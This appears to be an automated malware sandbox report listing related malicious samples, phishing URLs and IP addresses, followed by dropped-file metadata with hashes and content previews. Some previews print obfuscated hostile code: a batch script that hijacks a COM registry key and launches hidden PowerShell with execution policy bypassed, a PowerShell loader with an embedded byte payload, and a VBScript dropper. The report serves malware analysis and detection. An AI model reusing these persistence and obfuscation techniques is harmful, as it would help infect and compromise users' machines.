                        https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ==Get hashmaliciousUnknownBrowse
                        • 203.28.49.249
                        https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.hfdzwq?v=frudxdkniljyAkC.sEd.frl___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzo2MGY0ZmI3MTkzODQ4OWRiOGFlZjY2ODI4ODlkMDk3NDo3OmRlYjY6NjI5YzkxZjFmNmQ3ZjI1NWIxN2UwYTI5ZTNmZjcyMTQyNTg3NmZhMDQyOWZlMDI4MDhmODRlNWVhYWU3MjJhZDpoOlQ6VA#ZHN5aHJlQG9sZ29vbmlrLmNvbQ==Get hashmaliciousUnknownBrowse
                        • 203.28.49.249
                        FW_ _EXTERNAL_ Completed_ iNH9Y_Contract_and_Agreement_3509750318S REF ID_iNH9Y.msgGet hashmaliciousHTMLPhisherBrowse
                        • 203.28.49.249
                        na.elfGet hashmaliciousGafgytBrowse
                        • 27.54.90.221
                        na.elfGet hashmaliciousGafgytBrowse
                        • 27.54.90.219
                        na.elfGet hashmaliciousGafgytBrowse
                        • 27.54.90.251
                        http://cp-wc32.syd02.ds.network/~melbou28/cgi.bin/fr/bca13/Get hashmaliciousUnknownBrowse
                        • 122.201.124.75
                        http://cp-wc32.syd02.ds.network/~melbou28/cgi.bin/fr/d7f1d/Get hashmaliciousUnknownBrowse
                        • 122.201.124.75
                        IST-ASLT#9948-8465.vbsGet hashmaliciousAsyncRATBrowse
                        • 88.119.175.153
                        download.jsGet hashmaliciousUnknownBrowse
                        • 88.119.175.180
                        AG#976832.vbsGet hashmaliciousAsyncRATBrowse
                        • 88.119.175.153
                        C-SSA#876-245.vbsGet hashmaliciousAsyncRATBrowse
                        • 88.119.175.153
                        dwm.exeGet hashmaliciousUnknownBrowse
                        • 88.119.167.239
                        dwm.exeGet hashmaliciousUnknownBrowse
                        • 88.119.167.239
                        http://welcome.visionaryyouth.orgGet hashmaliciousUnknownBrowse
                        • 88.119.175.92
                        https://casestudybuddy.comGet hashmaliciousUnknownBrowse
                        • 88.119.175.92
                        https://scripts.mediavine.comGet hashmaliciousUnknownBrowse
                        • 88.119.175.92
                        http://earnandexcel.comGet hashmaliciousUnknownBrowse
                        • 88.119.175.92
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        3b5074b1b5d032e5620f69f9f700ff0e1728716649a09efaf02e58304d0d9f63a90bc410d1231b676f0024be47cb0cc1f511df7bca961.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 122.201.127.73
                        20062024150836 11.10.2024.vbeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                        • 122.201.127.73
                        Purchase Order No. 4500017624.jsGet hashmaliciousAgentTeslaBrowse
                        • 122.201.127.73
                        narud#U017ebenica TISAKOMERC d.o.oRadbrkkedes234525262623.wsfGet hashmaliciousRemcos, GuLoaderBrowse
                        • 122.201.127.73
                        https://document.cert-sha256.com/pages/10ab5b62ac22/XdXJasPWh0dHqBzOi8vZGo9jdW1ldmbnQufY2VydC1zfaGkEyNTYuY29tL3BhZ2VzhLzEwYWI1YjYyYWMyMiZlbWFpbF90ZW1wbGF0ZV9pZD04MjI4NjI5JmFjdGlvbj1wcmV2aWV3JnVzZXJfaWQ9NzM0MTE0NTY=Get hashmaliciousUnknownBrowse
                        • 122.201.127.73
                        http://starlightps.org/Get hashmaliciousUnknownBrowse
                        • 122.201.127.73
                        https://11100100000101837399030030030371.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                        • 122.201.127.73
                        67079aecc452b_xin.exeGet hashmaliciousUnknownBrowse
                        • 122.201.127.73
                        67065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                        • 122.201.127.73
                        https://core4ce.sharepoint.us/:u:/r/sites/Rampart/Shared%20Documents/Rampart_Architecturev2.vsdx?d=wb2c36d35ead642a0bb768843135cb471&e=4%3ae9566662f2044e998431c3da92e36b60&sharingv2=true&fromShare=true&xsdata=MDV8MDJ8dHlsZXIucG9vckBjb3JlNGNlLmNvbXwxYTdmMTE5MDQ5NDk0ZWNkZDAxZDA4ZGNlYTFhMDJiM3wyNGY1ZmRiNmUwYzI0NDFmYWU3ZmQxNTBjNzI4ZTM3YnwwfDB8NjM4NjQyNjQ0NjQ2MjQ2MjY0fFVua25vd258VFdGcGJHWnNiM2Q4ZXlKV0lqb2lNQzR3TGpBd01EQWlMQ0pRSWpvaVYybHVNeklpTENKQlRpSTZJazFoYVd3aUxDSlhWQ0k2TW4wPXwwfHx8&sdata=T1NBWmQzcmRTTTI2dmhrcnZIWG5ZZmFyRGFSUXZyVFhEajMxNTkyZmhHcz0%3dGet hashmaliciousHTMLPhisherBrowse
                        • 122.201.127.73
                        No context
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (559), with no line terminators
                        Category:dropped
                        Size (bytes):1121
                        Entropy (8bit):4.839407884982481
                        Encrypted:false
                        SSDEEP:24:QkH13XFbOfae5apKfPwqybOfae5apKfPw1kbd81bdxgDFI3M:HHLshUwPwqyshUwPw1D1bfgD+c
                        MD5:B8BDFC7895FEAAACBA3711D17BE6778A
                        SHA1:FA0BC12827B348FE540A13683897DEB207650DF7
                        SHA-256:E209153DDA335FEC8FA021F1022C4F9FE041CB527C2B9068EB9EC911429F20A3
                        SHA-512:EA91A8262EACBA0BCD6F692B5141124D7FEDC98507AD6AB71ADE565B347FE328780221F6972CC5C98A9471662474BF8C93E1219D241FF5F90579F7F8E8DD5156
                        Malicious:true
                        Preview:..&cls..@%pUBlIc:~89,83%%PUBLic:~5,1%CHo^ of^%PuBlIC:~46,16%f..SEt R^=Jg^%pUBLIc:~13,1%^gtGXz%pUBLIc:~4,1%w%pUBLIc:~11,1%^hm%pUBLIc:~10,1%^S^HI^O^A..^%pUBlIC:~14,1%^L%pUBliC:~55,17%^%publIc:~4,1%..@^e^c%r:~15,1%^%r:~17,1% ^%r:~17,1%n....RE%r:~5,1% %r:~18,1%DD %r:~15,1%KCU\%r:~14,1%of%r:~4,1%%r:~9,1%are\Cla%r:~8,1%%r:~8,1%e%r:~8,1%\CL%r:~14,1%%r:~16,1%D\{fd%r:~10,1%00e52-a214-4aa1-8f%r:~10,1%a-4357%r:~10,1%%r:~10,1%0072ec} /f..RE%r:~5,1% %r:~18,1%DD %r:~15,1%KCU\%r:~14,1%of%r:~4,1%%r:~9,1%are\Cla%r:~8,1%%r:~8,1%e%r:~8,1%\CL%r:~14,1%%r:~16,1%D\{fd%r:~10,1%00e52-a214-4aa1-8f%r:~10,1%a-4357%r:~10,1%%r:~10,1%0072ec}\%r:~16,1%nProc%r:~14,1%erver32 /ve /%r:~4,1% RE%r:~5,1%_%r:~14,1%Z /d C:\RedroCryp%r:~4,1%.dll /f..%r:~8,1%leep 3 .. ..c%r:~12,1%d /c Po%r:~9,1%er%r:~8,1%%r:~11,1%ell -noP -W %r:~11,1%%r:~2,1%dden -ep %r:~10,1%yPa%r:~8,1%%r:~8,1% -N%r:~17,1%N%r:~16,1% "C:\Pro%r:~1,1%ra%r:~12,1%Da%r:~4,1%a\Clo%r:~13,1%d\clo%r:~13,1%d.p%r:~8,1%1" ..@ec%r:~11,1%o off
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65367), with CRLF line terminators
                        Category:dropped
                        Size (bytes):600148
                        Entropy (8bit):3.5363791226435195
                        Encrypted:false
                        SSDEEP:6144:XN9T+q7nqYsybSDF2+4U/D8aMdAADFfqJuEmE13W9raQfKapVKrewrQOf6ekY:qgLCyGYfdTENW9raQ9a36DY
                        MD5:3DA9326215862462BDC3FDDC71C97F78
                        SHA1:D2E873CDCDD58713AD37326C38CAED667E1695F4
                        SHA-256:1E4988D1F45D8166ED2CF093B86595E73415130ABC31CBEF34E0C0183B79AA3E
                        SHA-512:5446C2DF685EB176A566C9B2C9ED7D7B4221D2DB27139D03BAD60FE916E47343B2469E11CE4E0AEB59A7F1434F50A216AE9CF7C914486A51F341A1E42F13E1F6
                        Malicious:true
                        Preview:..${e`hm} = [TYpe]("{0}{1}" -F'cO','nvERT'); &('sv') ('M6'+'N') ([tYpE]("{4}{3}{1}{2}{0}"-F'Bly','ASSe','M','FlEcTiON.','RE') ) ;..[byte[]]${b`yT`eARRaY} =[byte[]](..0x43, 0xDD, 0x4F, 0xBF, 0xA2, 0xD7, 0x4D, 0xB9, 0xA9, 0xBE, 0x67, 0x8F, 0x73, 0x8C, 0xE1, 0x0B, 0x68, 0x7E, 0x39, 0x15, 0xFF, 0xDC, 0x51, 0xC4, 0x46, 0xFE, 0x04, 0xC3, 0xAB, 0xF4, 0x46, 0xBE, 0x0B, 0x04, 0x58, 0x2F, 0xF9, 0x10, 0x45, 0x8B, 0xC2, 0xB3, 0xAB, 0xB9, 0xA9, 0xD9, 0x0D, 0x50, 0xE9, 0xA3, 0x10, 0x82, 0xBF, 0xA5, 0x12, 0x9E, 0x8C, 0x9D, 0x09, 0x64, 0x68, 0xBC, 0x73, 0xA4, 0x77, 0xB3, 0xC8, 0xEB, 0x4C, 0x0C, 0xC5, 0xAC, 0xBF, 0x1B, 0x30, 0x91, 0xCD, 0x97, 0xF0, 0x52, 0x8E, 0x82, 0x1E, 0x71, 0x9F, 0xD3, 0xB5, 0x7A, 0x55, 0x78, 0xAC, 0x74, 0xCD, 0x2E, 0x30, 0xBA, 0xA8, 0xC8, 0x3D, 0xDE, 0xC9, 0xD9, 0x42, 0x4B, 0x3B, 0xA7, 0xCE, 0x99, 0xA1, 0xD2, 0xBE, 0xA6, 0x29, 0x9D, 0x2B, 0x85, 0xE5, 0x0C, 0x49, 0xC8, 0xBF, 0x95, 0x09, 0x61, 0x13, 0x1F, 0x9E, 0xCE, 0x02, 0x7C, 0xA9, 0xEC, 0xE3, 0xC7, 0xC5, 0x6D, 0x6D, 0xC0, 0xE
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):4212
                        Entropy (8bit):5.159911778529968
                        Encrypted:false
                        SSDEEP:96:eWAWAI3s6JD7gqfPEwU552zY7gcITcowOJbXW0DTTtOT+:vfPdU55GYscDFZ0DTTtOT+
                        MD5:7079642A22A106D0ED6F227CC70899AE
                        SHA1:60DD57AF3518C0EA4104379AD233B5982B231283
                        SHA-256:B098E1055DC3DD3156236EE515E5DFBEFD746D84578197F2309968625B831724
                        SHA-512:CA1E9E201785FA611520EE2585208FB0684FD338FF1AB1D515523E03677AC4AC1CA5353FDC17BCBA4C6C39AA37F9BE182C5F7187B8DD9520C8604A001BD69F80
                        Malicious:true
                        Preview:On Error Resume Next..On Error Resume Next..On Error Resume Next..'QFQFc8sj833t454ma7qkQFQFc8sj833t454ma7qkQFQFQFQFQFQFQFQFQFc8sj833t454ma7qkQFQFQFQFQFQFc8sj833t454ma7qkQFQFc8sj833t454ma7qkQFQFQFQFQFQFQFQFQFc8sj833t454ma7qkQFQFQFQFDim nizhhbpuggmfrbaxucnzpiwzeizjycxxcpsynsbm..Dim xnfffjvlesbkmfbpgpcuffsvbnkkdghywvtdvzswozk..Dim rymybvkowmnccyvugodqyblcdvrcbfqgrjmvyfczjvbrphotfzxazzwiljvsfygmjduizqvfznrok..Dim tabunxizenzaqcvwjpuldvcpumirujmrcwzyedfysohejchjonjegobbpx..Dim dqkwwpkkbrabcrjmnftmylphdippgacnalpcyjuauwiemsadnjtofewtimyopsmsd..Dim cqjnqsprnmchyrcggjininzatipvtxhuuaynyxloxyugve..Dim fpmsblvtbrgsyqsntfjeaohhdtbbbddzll..Dim renewzldjovzrhaxlglkrtljrpyzymfcehjeokmdbjrfplakblyvnpppnjdncb..Dim mjrmzvvdpqurxdrhdndijojegespianhyrtinaptcptstekuzvzhmhsiohhfahdfwuvawzgrmaxw..Dim nrpvstueupcyokhlcqkjhqopuakgycmmnxdcjjylqcsfonjccekpbnmpkxbhklyuygbkmngaxlspkrpohcpx..Dim avseischradvnwhwvkiqqpafcikmugeyysmczafhtknselrzmopfyggbecvhefahxjjgvuo..Dim oltpvqnkqpdoxsvcbxauusrhsfugyiqfffalrwyhmes
                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                        File Type:CSV text
                        Category:dropped
                        Size (bytes):425
                        Entropy (8bit):5.353683843266035
                        Encrypted:false
                        SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                        MD5:859802284B12C59DDBB85B0AC64C08F0
                        SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                        SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                        SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                        Malicious:false
                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):61147
                        Entropy (8bit):5.077943793919534
                        Encrypted:false
                        SSDEEP:1536:DA1+z307j1bV3CNBQkj2Uh4iUxqaVLflJnPvlOSHkqdxJfSb7OdBYNPzqtAHkwN7:01+z30n1bV3CNBQkj2UqiUqaVLflJnPa
                        MD5:95B7548D8D8DDBAB0877BFC7F500503D
                        SHA1:894B9735A30AE067FF88622B4F9C8EDF36997F6F
                        SHA-256:D6C8E2EF650282C5B78D4CB89DE7FA47D0AC7A3818250101A2418B793D7C4BBA
                        SHA-512:B552E36B17A92C584B269C73A9888AC67D19C28326EF39B7F1611CB6756B112BD113A9815EAB3BC6B51A6DBEFE4680C7532DD5D4F4102791BBB2021E4DDD8E54
                        Malicious:false
                        Preview:PSMODULECACHE.\...I.\.%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64
                        Entropy (8bit):0.34726597513537405
                        Encrypted:false
                        SSDEEP:3:Nlll:Nll
                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                        Malicious:false
                        Preview:@...e...........................................................
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
